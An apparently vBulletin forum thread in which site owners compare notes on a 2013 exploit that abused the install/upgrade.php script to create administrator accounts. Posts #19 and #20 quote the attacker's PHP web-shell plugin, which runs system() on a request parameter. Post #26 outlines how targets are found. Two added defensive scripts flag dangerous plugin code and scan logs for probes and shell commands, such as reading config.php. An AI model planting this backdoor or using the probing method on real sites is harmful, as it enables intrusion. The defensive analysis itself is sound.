A new type of hack method?

• #16
  Originally posted by DF031:
    I agree, what about all those admins not visiting the forums?

    VB should have contacted all forum owners. It is not too late to do that and provide this basic support!

  Agreed!! I "happened" to see this in the CP yesterday, and went ahead and did what they said. BUT, they didn't say "check to see if you had admin accounts to see if you have been compromised." I did what they asked and researched no further. Today I am out like 40,000 posts that were deleted early this morning.

  How about an email to all owners, not only with a fix, but what to check to see if you've been compromised? Handled very badly.


• #17
  Originally posted by Hawkmoth:
    As above. This problem was found on Tuesday morning about 11 am Japan time. Like reignman, we had 2 people registered as federal. One is now deleted and the other had all permissions removed and PW changed. I have no idea how he got in. All new members receive an email with an activation link in it. They have to click to become active but even then they only go into an admin queue for final approval. Supposedly, no one can do anything until admin approval and only admins can do it, not mods. Maybe Abdou found some way to make himself an admin but I don't know how.

    I have also found a file "federal" in the plugin and that is removed. We only have vb software and vb advanced for the front page (with all our language forums). vba is the only plugin that is set up. All "abdou" did is deface our frontpage. The forum works fine from forum/php page. I have removed the install file as Zachary has indicated. But the problem has not been resolved.

    NB: vis-à-vis Abdou, we may have identified him and some of his hacker friends. Since our website runs on a US server Abdou has violated federal law (maybe USC Title 18 but I don't have the citation in front of me). Abdou has been reported to law enforcement agencies in the USA and UK among others. If anyone else has been hacked and you have any LE friends, let them know.

  He gets admin privileges when registering to the forum (using the exploit), so he can do whatever he wants.

  Another warning to forum owners: if your password in config.php is equal to your FTP/server passwords, you have to change these passwords.


• #18
  Originally posted by Jamsoft:
    Agreed!! I "happened" to see this in the CP yesterday, and went ahead and did what they said. BUT, they didn't say "check to see if you had admin accounts to see if you have been compromised." I did what they asked and researched no further. Today I am out like 40,000 posts that were deleted early this morning.

    How about an email to all owners, not only with a fix, but what to check to see if you've been compromised? Handled very badly.

  Yes, that was a big mistake. I don't know why the CP message didn't include this "added admins" warning.

  By the way, are you sure that these messages were deleted by this hacker called "abdou"?


• #19
  I have the same problem. The hacker has registered as an Admin, then created a plugin with the hook location ajax_start:

  Code:
  // Backdoor plugin body on the ajax_start hook: a request carrying ?lol=<cmd> runs <cmd> as the web server user
  if (isset($_GET['lol'])) {
      echo "<h1>pwn</h1><pre>";
      system($_GET['lol']);
      exit;
  }

  Please advise. I don't have the install directory at all prior to this hack.


• #20
  Originally posted by Infection:
    I have the same problem. The hacker has registered as an Admin, then created a plugin with the hook location ajax_start:

    Code:
    // Backdoor plugin body on the ajax_start hook: a request carrying ?lol=<cmd> runs <cmd> as the web server user
    if (isset($_GET['lol'])) {
        echo "<h1>pwn</h1><pre>";
        system($_GET['lol']);
        exit;
    }

    Please advise. I don't have the install directory at all prior to this hack.

  Which version do you use? If you use vBulletin 5, the install directory is inside the core directory: /core/install

  He needs install/upgrade.php in order to complete the hijacking, so if you don't have an "install" directory and still have the above problem, that means it's another vulnerability.
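
Given the symptoms described in #17, #19 and #20 (a plugin named "federal" sitting on the ajax_start hook, and accounts that arrive with admin rights), the two checks an owner wants before restoring anything are: which plugin rows contain a shell or eval primitive, and which accounts are administrators. The script below is an added example, not code from vBulletin or from anyone in this thread. It runs offline against an in-memory SQLite stand-in for two tables whose column names follow vBulletin 4's default schema; the rows are constructed, the backdoor row being the code quoted in #19. It assumes the Administrators usergroup keeps its default id of 6 and that your real tables carry whatever TABLE_PREFIX is set in includes/config.php; the equivalent MySQL queries are in the comments.

```python
import re
import sqlite3

# Assumption: the Administrators usergroup keeps vBulletin's default id of 6.
ADMIN_GROUP_ID = 6

# Constructed sample rows standing in for the vBulletin `plugin` and `user`
# tables (column names as in the 4.x default schema; prefix with TABLE_PREFIX
# from includes/config.php on a real install).
SAMPLE_PLUGINS = [
    # (pluginid, title, hookname, phpcode, product, active)
    (1, "Thanks counter", "postbit_display_complete", "$show['thanks'] = true;", "vbulletin", 1),
    # The backdoor quoted in post #19, verbatim:
    (2, "federal", "ajax_start",
     """if(isset($_GET['lol'])){echo "<h1>pwn</h1><pre>"; system($_GET['lol']);exit;}""",
     "vbulletin", 1),
    # A disabled but still present obfuscated loader (constructed):
    (3, "cache helper", "global_start", "eval(base64_decode('aWYoMSl7fQ=='));", "vbulletin", 0),
]

SAMPLE_USERS = [
    # (userid, username, usergroupid, membergroupids, ipaddress, joindate)
    (1, "owner", 6, "", "203.0.113.10", 1199145600),
    (2, "moderator", 7, "", "203.0.113.11", 1273017600),
    # Registered as a normal member, then given group 6 as a secondary group, no IP recorded:
    (3, "administrator", 2, "6", "", 1377820800),
    (4, "Th3H4ck", 6, "", "", 1377993600),
]

# PHP primitives that have no business in a plugin you did not write yourself,
# and the superglobals that turn one of them into a remote shell.
DANGEROUS_CALL = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert|"
    r"create_function|base64_decode|gzinflate|str_rot13)\s*\(", re.I)
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")

# Equivalent queries on the live MySQL database (adjust the table prefix):
#   SELECT pluginid, title, hookname, active FROM plugin
#    WHERE phpcode REGEXP 'system\\(|exec\\(|passthru\\(|eval\\(|base64_decode\\(';
#   SELECT userid, username, ipaddress, FROM_UNIXTIME(joindate) FROM user
#    WHERE usergroupid = 6 OR FIND_IN_SET('6', membergroupids);


def build_db():
    """In-memory stand-in for the forum database, loaded with the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE plugin (pluginid INTEGER, title TEXT, hookname TEXT, "
                "phpcode TEXT, product TEXT, active INTEGER)")
    con.execute("CREATE TABLE user (userid INTEGER, username TEXT, usergroupid INTEGER, "
                "membergroupids TEXT, ipaddress TEXT, joindate INTEGER)")
    con.executemany("INSERT INTO plugin VALUES (?,?,?,?,?,?)", SAMPLE_PLUGINS)
    con.executemany("INSERT INTO user VALUES (?,?,?,?,?,?)", SAMPLE_USERS)
    return con


def suspicious_plugins(con):
    """Plugins whose PHP calls a command/eval primitive, with a flag for whether raw
    request input reaches the code (the shape of the posted backdoor). Inactive
    plugins are reported too: an attacker can re-enable them from the admin CP."""
    hits = []
    for pid, title, hook, code, active in con.execute(
            "SELECT pluginid, title, hookname, phpcode, active FROM plugin ORDER BY pluginid"):
        funcs = sorted({m.group(1).lower() for m in DANGEROUS_CALL.finditer(code)})
        if funcs:
            hits.append({"pluginid": pid, "title": title, "hookname": hook,
                         "active": bool(active), "functions": funcs,
                         "uses_request_input": bool(REQUEST_INPUT.search(code))})
    return hits


def admin_accounts(con, admin_gid=ADMIN_GROUP_ID):
    """Every account that is an administrator by primary group or through the
    comma-separated membergroupids list. Compare against the admins you know."""
    admins = []
    for uid, name, gid, mgids, ip, joined in con.execute(
            "SELECT userid, username, usergroupid, membergroupids, ipaddress, joindate "
            "FROM user ORDER BY userid"):
        secondary = {g.strip() for g in (mgids or "").split(",") if g.strip()}
        if gid == admin_gid or str(admin_gid) in secondary:
            admins.append({"userid": uid, "username": name, "joindate": joined,
                           "via_secondary_group": gid != admin_gid,
                           "no_ip_recorded": not ip})
    return admins


if __name__ == "__main__":
    db = build_db()
    for h in suspicious_plugins(db):
        print("PLUGIN", h)
    for a in admin_accounts(db):
        print("ADMIN ", a)
```

Run the two queries against a dump restored on a scratch host, or adapt them to MySQL as in the comments. Treat every plugin or administrator you do not recognise as attacker-controlled, and rotate the database password in config.php together with any FTP or server password that matches it, as #17 warns.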


• #21
  I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

  I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?


• #22
  Originally posted by Reignman:
    Which version do you use? If you use vBulletin 5, the install directory is inside the core directory: /core/install

    He needs install/upgrade.php in order to complete the hijacking, so if you don't have an "install" directory and still have the above problem, that means it's another vulnerability.

  I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

  Does anyone have any ideas as to what this could be?


• #23
  Originally posted by KryptonSite:
    I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

    I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?

  Do you have any "strange" plugin on your vBulletin products? It's one of the symptoms of this exploit.

  Originally posted by Infection:
    I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

    Does anyone have any ideas as to what this could be?

  Probably it's another one. Better contact vBulletin support.

  Bad thing is I see slight changes in the code and hacking messages. So I think it's now spread around.


• #24
  My site was hacked with a new name:
  www.jntuhub.com | www.jntuhub.in |


• #25
  How does something like this get around so quickly?
  Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
  I haven't been affected yet, maybe because I was active in the admin CP at the time of the notification and deleted the install folder?

  But is the install folder the hole? Has this been clarified?

  How do they find a vulnerable site to begin with? Surely there is no Google search term 'vulnerable vB sites'.

  What do they search for in order to complete the job?


• #26
  Originally posted by DemOnstar:
    How does something like this get around so quickly?
    Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
    I haven't been affected yet, maybe because I was active in the admin CP at the time of the notification and deleted the install folder?

    But is the install folder the hole? Has this been clarified?

    How do they find a vulnerable site to begin with? Surely there is no Google search term 'vulnerable vB sites'.

    What do they search for in order to complete the job?

  Yes, the hole is in the install folder (at least for this exploit).

  They search for vBulletin-powered websites using phrases like (powered by vbulletin 4.2.0 / 4.2.1 / 5) and then they check manually if the install folder exists by typing domain.com/forumpath/install/upgrade.php

  If it exists they complete the job using the exploit they found. (I wonder if the vBulletin team has found what it is yet???) If it doesn't exist, they turn back to "Google" and search for other potential victims.

  But what we know is they can use this exploit only on 4.2.0+ and 5 versions of vBulletin.
  Last edited by Reignman; Mon 2nd Sep '13, 5:01am.

  DemOnstar commented:
    Very good Reignman, that is exactly what I wanted to hear... It seems so easy to mess up someone's life... and all that is needed is a search on Google... Extraordinary!

• #27
  What about VB not sending an advice email to licensed members?? I was here for another problem and now I am reading this thread, really surprised!!


• #28
  Looks like I got hit with a similar exploit - they did not deface my site like the OP's - not yet anyway. They did find a way to add about 10 new users, all with the same username (Th3H4ck) and all with admin privs.

  I would not have known about this vulnerability, or the active exploit, if they had not... maybe I should not post what triggered my knowledge of this.

  I would have liked to have received an email about this exploit. Now going to 302 redirect to my BuddyPress install. Hope my host has a backup of the database and files from 5 days ago. Fingers crossed.

  vBulletin 4.2.1 running, and had new member moderation turned on.

  What I wonder is how they were able to run SQL insert commands from /forums/core/install/upgrade.php, when I do not even have a /core/ or /core/install/ folder on this server.

  Will we get an email if the exploit fix is found?
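
Reignman's answer in #26 (attackers google for vBulletin sites, then request domain.com/forumpath/install/upgrade.php) and djsteve007's question in #28 (how upgrade.php was used to run SQL inserts) both point at the web server's access log as the place to see whether your forum was probed, whether the installer actually answered, and what was run through a planted plugin. The scanner below is an added example, not from the original posts or from vBulletin. It parses the Apache/nginx "combined" format, flags any request for an install/upgrade.php path (which covers both the 4.x /install and the 5.x /core/install locations named in #20 and #30) together with its status code, and decodes commands sent to ajax.php through the lol parameter used by the plugin in #19. The log lines are constructed and use documentation IP ranges; the parameter name is an assumption carried over from that one post, so add whatever names you find in your own plugin table.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format: client ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Matches install/upgrade.php under any prefix, so both the 4.x path
# (/forum/install/upgrade.php) and the 5.x one (/forum/core/install/upgrade.php).
INSTALLER_RE = re.compile(r"/install/upgrade\.php$", re.I)

# Query parameter read by the plugin in post #19. Assumption: it is attacker-chosen,
# so add whatever names you find in your own plugin table.
BACKDOOR_PARAMS = {"lol"}

# Constructed sample log lines (RFC 5737 documentation addresses, not real clients).
SAMPLE_LOG = """\
203.0.113.5 - - [30/Aug/2013:02:14:07 +0000] "GET /forum/install/upgrade.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Aug/2013:02:14:40 +0000] "POST /forum/install/upgrade.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Aug/2013:02:20:11 +0000] "GET /forum/ajax.php?lol=id HTTP/1.1" 200 221 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Aug/2013:03:01:02 +0000] "GET /forum/ajax.php?lol=cat%20includes%2Fconfig.php HTTP/1.1" 200 4021 "-" "curl/7.30.0"
192.0.2.9 - - [30/Aug/2013:03:05:00 +0000] "GET /forum/forumdisplay.php?f=12 HTTP/1.1" 200 30122 "-" "Mozilla/5.0"
192.0.2.9 - - [30/Aug/2013:03:05:10 +0000] "GET /forum/core/install/upgrade.php HTTP/1.1" 404 300 "-" "Mozilla/5.0"
""".splitlines()


def parse_line(line):
    """One combined-format line -> dict, or None for a line in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return (kind, detail) for a request worth looking at, else None."""
    url = urlsplit(entry["target"])
    if INSTALLER_RE.search(url.path):
        served = entry["status"] < 400
        return ("installer_probe",
                f"{entry['method']} {url.path} -> {entry['status']}"
                + (" (installer still reachable)" if served else " (not served)"))
    if url.path.lower().endswith("/ajax.php"):
        params = parse_qs(url.query)  # parse_qs percent-decodes the values
        for name in BACKDOOR_PARAMS:
            if name in params:
                return ("backdoor_command", params[name][0])
    return None


def scan(lines):
    """All installer probes and backdoor commands, in log order."""
    events = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hit = classify(entry)
        if hit is not None:
            events.append({"ip": entry["ip"], "time": entry["time"], "kind": hit[0],
                           "detail": hit[1], "status": entry["status"]})
    return events


def offenders(events):
    """Event count per client address, most active first."""
    return Counter(e["ip"] for e in events).most_common()


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for e in found:
        print(e["time"], e["ip"], e["kind"], e["detail"])
    print("by client:", offenders(found))
```

A 404 on the installer path means the directory was already gone when that client tried. A 200, and above all a POST, means the installer was reachable to that client, and the plugin and administrator checks are due; the decoded ajax.php commands then tell you what the attacker actually did with the shell.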


• #29
  Originally posted by djsteve007:
    Will we get an email if the exploit fix is found?

  I think that is extremely likely now. Although, stranger things can happen...


• #30
  Originally posted by djsteve007:
    vBulletin 4.2.1 running, and had new member moderation turned on.

    What I wonder is how they were able to run SQL insert commands from /forums/core/install/upgrade.php, when I do not even have a /core/ or /core/install/ folder on this server.

  If you use version 4, you don't have /core/install but only /install in your forum root.
